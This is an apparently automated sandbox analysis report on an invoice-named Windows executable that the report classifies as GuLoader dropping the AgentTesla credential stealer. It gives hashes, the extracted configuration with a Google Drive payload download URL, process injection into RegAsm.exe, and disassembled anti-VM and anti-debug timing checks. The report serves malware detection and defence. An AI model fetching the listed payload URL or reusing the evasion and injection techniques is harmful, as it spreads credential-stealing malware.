Play interactive tour

Edit tour

Analysis Report faktura_ODfk0021.exe

Overview

General Information

Sample Name:	faktura_ODfk0021.exe
Analysis ID:	387666
MD5:	b7b1644fce14205acecbe822df95749a
SHA1:	4cbfa9cf4b8dc27bf2b2a2463761092d5c2402e7
SHA256:	f760c40ea4cca84e06c511f96c8d43525350e3f52c97c1baa30528d9c4fbcfec
Infos:
Most interesting Screenshot:

Detection

AgentTesla GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Potential malicious icon found

Yara detected AgentTesla

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w10x64

faktura_ODfk0021.exe (PID: 3784 cmdline: 'C:\Users\user\Desktop\faktura_ODfk0021.exe' MD5: B7B1644FCE14205ACECBE822DF95749A)

RegAsm.exe (PID: 6328 cmdline: 'C:\Users\user\Desktop\faktura_ODfk0021.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)

conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1aKE_k9PJVE2kZn5sEN4ZiJNhonuPIbPw", "Injection Process": ["RegAsm.exe", "RegSvcs.exe", "MSBuild.exe"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.499283716.000000001DA11000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.499283716.000000001DA11000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.491326318.0000000000C21000.00000040.00000001.sdmp	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: RegAsm.exe PID: 6328	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegAsm.exe PID: 6328	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 6328	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000003.00000002.491326318.0000000000C21000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1aKE_k9PJVE2kZn5sEN4ZiJNhonuPIbPw", "Injection Process": ["RegAsm.exe", "RegSvcs.exe", "MSBuild.exe"]}

Source: faktura_ODfk0021.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 172.217.23.33:443 -> 192.168.2.7:49712 version: TLS 1.2

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&id=1aKE_k9PJVE2kZn5sEN4ZiJNhonuPIbPw

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS traffic detected: queries for: doc-0s-04-docs.googleusercontent.com

Source: RegAsm.exe, 00000003.00000002.499283716.000000001DA11000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 00000003.00000002.499283716.000000001DA11000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 00000003.00000002.491961756.0000000000FFA000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegAsm.exe, 00000003.00000002.491961756.0000000000FFA000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: RegAsm.exe, 00000003.00000002.491961756.0000000000FFA000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: RegAsm.exe, 00000003.00000002.491961756.0000000000FFA000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: RegAsm.exe, 00000003.00000002.491961756.0000000000FFA000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: RegAsm.exe, 00000003.00000002.491961756.0000000000FFA000.00000004.00000020.sdmp	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: RegAsm.exe, 00000003.00000002.499283716.000000001DA11000.00000004.00000001.sdmp	String found in binary or memory: http://zQsfOZ.com
Source: RegAsm.exe, 00000003.00000002.491917908.0000000000FE7000.00000004.00000020.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: RegAsm.exe, 00000003.00000002.491961756.0000000000FFA000.00000004.00000020.sdmp	String found in binary or memory: https://doc-0s-04-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/uq2l008j
Source: RegAsm.exe	String found in binary or memory: https://drive.google.com/uc?export=download&id=1aKE_k9PJVE2kZn5sEN4ZiJNhonuPIbPw
Source: RegAsm.exe, 00000003.00000002.491961756.0000000000FFA000.00000004.00000020.sdmp	String found in binary or memory: https://pki.goog/repository/0
Source: RegAsm.exe, 00000003.00000002.499283716.000000001DA11000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown

HTTPS traffic detected: 172.217.23.33:443 -> 192.168.2.7:49712 version: TLS 1.2

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	Code function: 0_2_022B3BC4 NtResumeThread,	0_2_022B3BC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00C23BC4 NtQueryInformationProcess,	3_2_00C23BC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00C236EE NtProtectVirtualMemory,	3_2_00C236EE

Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	Code function: 0_2_004015B4	0_2_004015B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1D9E47A0	3_2_1D9E47A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1D9E4790	3_2_1D9E4790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1D9E4773	3_2_1D9E4773

Source: faktura_ODfk0021.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: faktura_ODfk0021.exe, 00000000.00000002.324592390.0000000002A30000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameCass7.exeFE2XADP vs faktura_ODfk0021.exe
Source: faktura_ODfk0021.exe, 00000000.00000002.323533035.0000000000412000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameCass7.exe vs faktura_ODfk0021.exe
Source: faktura_ODfk0021.exe	Binary or memory string: OriginalFilenameCass7.exe vs faktura_ODfk0021.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Section loaded: sfc.dll

Jump to behavior

Source: faktura_ODfk0021.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@4/0@1/1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_01

Source: faktura_ODfk0021.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\faktura_ODfk0021.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\faktura_ODfk0021.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\faktura_ODfk0021.exe 'C:\Users\user\Desktop\faktura_ODfk0021.exe'
Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\faktura_ODfk0021.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\faktura_ODfk0021.exe'	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000003.00000002.491326318.0000000000C21000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6328, type: MEMORY

Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	Code function: 0_2_00401E78 pushfd ; retn 0000h	0_2_0040228E
Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	Code function: 0_2_004066CF push ebp; retf	0_2_004066E0
Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	Code function: 0_2_00406D53 push 38BB86EFh; retf	0_2_00406D6B
Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	Code function: 0_2_022B0104 push ADC64FC2h; iretd	0_2_022B0109
Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	Code function: 0_2_022B0F63 push ds; retf	0_2_022B0F7C
Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	Code function: 0_2_022B0174 push ADC64FC2h; iretd	0_2_022B0179
Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	Code function: 0_2_022B2F47 push edx; retf	0_2_022B2F48
Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	Code function: 0_2_022B0144 push ADC64FC2h; iretd	0_2_022B0149
Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	Code function: 0_2_022B01AC push ADC64FC2h; iretd	0_2_022B01B1
Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	Code function: 0_2_022B1DFB push edx; retf	0_2_022B1DFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1D9EC598 push 941FABA6h; retf	3_2_1D9EC64D

Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00C231D9	3_2_00C231D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00C233E3	3_2_00C233E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00C233FD	3_2_00C233FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00C2323A	3_2_00C2323A

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	RDTSC instruction interceptor: First address: 00000000022B1C7E second address: 00000000022B1CBD instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a push ecx 0x0000000b test ax, cx 0x0000000e test dl, 00000017h 0x00000011 call 00007F21FCFA4CE6h 0x00000016 call 00007F21FCFA4CD8h 0x0000001b lfence 0x0000001e mov edx, dword ptr [7FFE0014h] 0x00000024 lfence 0x00000027 ret 0x00000028 mov esi, edx 0x0000002a pushad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	RDTSC instruction interceptor: First address: 00000000022B1CBD second address: 00000000022B1CBD instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F21FCF9DB48h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e add edi, edx 0x00000020 test eax, eax 0x00000022 dec ecx 0x00000023 cmp bh, bh 0x00000025 cmp ecx, 00000000h 0x00000028 jne 00007F21FCF9DB1Eh 0x0000002a pushad 0x0000002b nop 0x0000002c nop 0x0000002d mov eax, 00000001h 0x00000032 cpuid 0x00000034 popad 0x00000035 push ecx 0x00000036 test ax, cx 0x00000039 test dl, 00000017h 0x0000003c call 00007F21FCF9DB66h 0x00000041 call 00007F21FCF9DB58h 0x00000046 lfence 0x00000049 mov edx, dword ptr [7FFE0014h] 0x0000004f lfence 0x00000052 ret 0x00000053 mov esi, edx 0x00000055 pushad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	RDTSC instruction interceptor: First address: 00000000022B347F second address: 00000000022B347F instructions:
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000C233C1 second address: 0000000000C233C1 instructions:

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: RegAsm.exe, 00000003.00000002.491326318.0000000000C21000.00000040.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE8
Source: RegAsm.exe	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	RDTSC instruction interceptor: First address: 00000000022B1C7E second address: 00000000022B1CBD instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a push ecx 0x0000000b test ax, cx 0x0000000e test dl, 00000017h 0x00000011 call 00007F21FCFA4CE6h 0x00000016 call 00007F21FCFA4CD8h 0x0000001b lfence 0x0000001e mov edx, dword ptr [7FFE0014h] 0x00000024 lfence 0x00000027 ret 0x00000028 mov esi, edx 0x0000002a pushad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	RDTSC instruction interceptor: First address: 00000000022B1CBD second address: 00000000022B1CBD instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F21FCF9DB48h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e add edi, edx 0x00000020 test eax, eax 0x00000022 dec ecx 0x00000023 cmp bh, bh 0x00000025 cmp ecx, 00000000h 0x00000028 jne 00007F21FCF9DB1Eh 0x0000002a pushad 0x0000002b nop 0x0000002c nop 0x0000002d mov eax, 00000001h 0x00000032 cpuid 0x00000034 popad 0x00000035 push ecx 0x00000036 test ax, cx 0x00000039 test dl, 00000017h 0x0000003c call 00007F21FCF9DB66h 0x00000041 call 00007F21FCF9DB58h 0x00000046 lfence 0x00000049 mov edx, dword ptr [7FFE0014h] 0x0000004f lfence 0x00000052 ret 0x00000053 mov esi, edx 0x00000055 pushad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	RDTSC instruction interceptor: First address: 00000000022B1DAB second address: 00000000022B1DAB instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F21FCFA60E7h 0x0000001d popad 0x0000001e call 00007F21FCFA4CDAh 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	RDTSC instruction interceptor: First address: 00000000022B347F second address: 00000000022B347F instructions:
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000C21DAB second address: 0000000000C21DAB instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F21FCFA60E7h 0x0000001d popad 0x0000001e call 00007F21FCFA4CDAh 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000C233C1 second address: 0000000000C233C1 instructions:

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00C216D0 rdtsc

3_2_00C216D0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 3333			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 6505			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6196

Thread sleep time: -23980767295822402s >= -30000s

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: RegAsm.exe, 00000003.00000002.491326318.0000000000C21000.00000040.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe8
Source: RegAsm.exe, 00000003.00000002.491917908.0000000000FE7000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\faktura_ODfk0021.exe	Process queried: DebugPort			Jump to behavior
